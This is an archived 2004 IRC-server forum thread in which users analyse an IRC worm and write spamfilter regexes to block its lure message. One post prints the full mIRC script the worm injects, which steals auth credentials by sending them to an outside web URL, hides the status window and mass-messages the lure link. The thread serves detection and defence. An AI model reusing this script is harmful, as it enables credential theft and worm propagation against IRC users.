bloodhound.exploit.6 (symantec's name for it)

These are old archives. They are kept for historic purposes only.
Post Reply
nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:

bloodhound.exploit.6 (symantec's name for it)

Post by nexus » Mon May 10, 2004 10:45 pm

this was seen spreading via channel msg's recently on the net I'm on:

Code: Select all

www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
infected users always send that exact text in a channel to new users that join

I wrote a simple spamfilter that works fine, but it probably could use some tweaking ;)

Code: Select all

spamfilter {
	regex "^www\.fun-pix\.tk/blub_fish\.jpg <------- looooooooooool";
	target channel;
	reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
	action block;
};

nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:

Post by nexus » Mon May 10, 2004 10:57 pm

maybe something like this would be better, in case more urls need to be added to the regex later (saves space)

Code: Select all

spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Tue May 11, 2004 3:47 pm

Thanks for the report, will take a look :).

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Tue May 11, 2004 5:04 pm

Pretty harmless/simple/stupid thing, this is what it does:
It exploits some known IE vuln that X other trojans also use (don't care to look it up ;p)... and then a highly advanced visual basic exe gets started (*laugh*) which tries to use DDE to send the following stuff:

Code: Select all

//write a.mrc on *:socklisten:x:sockaccept i | write a.mrc on *:sockread:i:sockread % $+ t $chr(124) tokenize 32 % $+ t $chr(124) if ($3 == :auth) url -an $!+(mitglied.lycos.de/z4p2k/a.php?d=,$encode($4,m),|,$encode($5,m)) | .load -rs a.mrc | socklisten x 6660 | server -m localhost 6660 | .timer -io 1 1 scon $!scon(0) window -h $+($chr(34),Status Window,$chr(34)) $chr(43) | .timer -io 1 1 scon $!scon(0) auth usepw q q  | .timer -io 1 1 scon $!scon(0) auth usepw 1 | scon -a .AMSG www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
What is interresting is that the exe file contains the following:

Code: Select all

@*\AD:\Stefan\visual basic codes\code99\dde-mirc.vbp
and even:

Code: Select all

CompanyName
Delta Konzept GmbH
(which you can find with google)

now this seem SOO stupid that it might be intentional (or part of it) ;).
Anyway.. still fun. *dinner*.

Dukat
Posts: 1083
Joined: Tue Mar 16, 2004 5:44 pm
Location: Switzerland

Post by Dukat » Thu Jun 10, 2004 8:50 am

nexus wrote:maybe something like this would be better, in case more urls need to be added to the regex later (saves space)

Code: Select all

spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};
I think this regex is wrong (sorry for reposting in such an old thread).
But if I am right, the regex is wrong too in the CVS... :shock:

If the message is

Code: Select all

www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
Then

Code: Select all

^www\.fun-pix\.tk/blub_fish\.jpg <-{7} lo{12}l$
would be the correct regex, wouldn't it?

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Jun 10, 2004 4:45 pm

Actually, an even better regex would be:

Code: Select all

www\.fun-pix\.tk/blub_fish\.jpg <-+ lo+l
Differences being:
  • Removed BOL and EOL assertions, to account for variants that insert whitespace/color codes/other messages before or after the string.
  • Changed fixed length of the <- and lol portions to catch any lenght, since variants can easily modify these with more or less '-' or 'o' characters.
I can't imagine hitting false positives, when requring a match against an exact URL (might want to account for variants here?).

codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr » Thu Jun 10, 2004 5:11 pm

There is a reason we try to use ^ and $ as much as possible. Your's can have false positives. And here is an example,

<User> Someone just messaged me with, "www.fun-pix.tk/blub_fish.jpg <------- looooooooooool" I think it is a virus, what should I do?

That would be blocked since it doesn't make sure that no other text is there.
-- codemastr

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Jun 10, 2004 5:22 pm

Hmm... yeah...

Then again, users would have no need to send messages of that kind if you block the original (the user would never receive it).

So maybe keep the ^ and $ :) . I was just trying to account for variants that could insert text at the beginning or end, but then if such a variant does occur, we can tweak the spamfilter to hit that as well, I guess ;) .

Dukat
Posts: 1083
Joined: Tue Mar 16, 2004 5:44 pm
Location: Switzerland

Post by Dukat » Sat Jun 12, 2004 7:48 am

Well, BOT, the Regex in the CVS is ATM just wrong and won't match. "Someone" should correct it... :D
Or should I write a bug report? :wink:

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Sat Jun 12, 2004 2:57 pm

Yeah, seems you are right... Strange nobody noticed :(.

Anyway, the page is down now so it no longer matters :p.
(perhaps a good idea to do a cleanup once in a while)

About ^ and $.. I'm always a bit unsure... coz if a user pastes it like that, eg:
<User> <spreader> go to: http://www.virus.com/infectyou.html
<User> any idea what this is??
then the other user might click on it... and we end up with another infection.
So I can understand both points, neither one is perfect :P.
Anyway, another case: a virus spreading in msg.. then the user might paste it like that in a channel... which we didn't block at all... users are always a fun factor ;).
Basically I always just hope that this stuff is kept to a minimum, since we are presumed to block all the stuff in the first place so it never reaches the user... only thing left is cross-nets (or 'old events' / logs).. like: got a virus on dalnet, then ask on an unrealnet (where you are also connected to) what it is.
Blablabla :)

Post Reply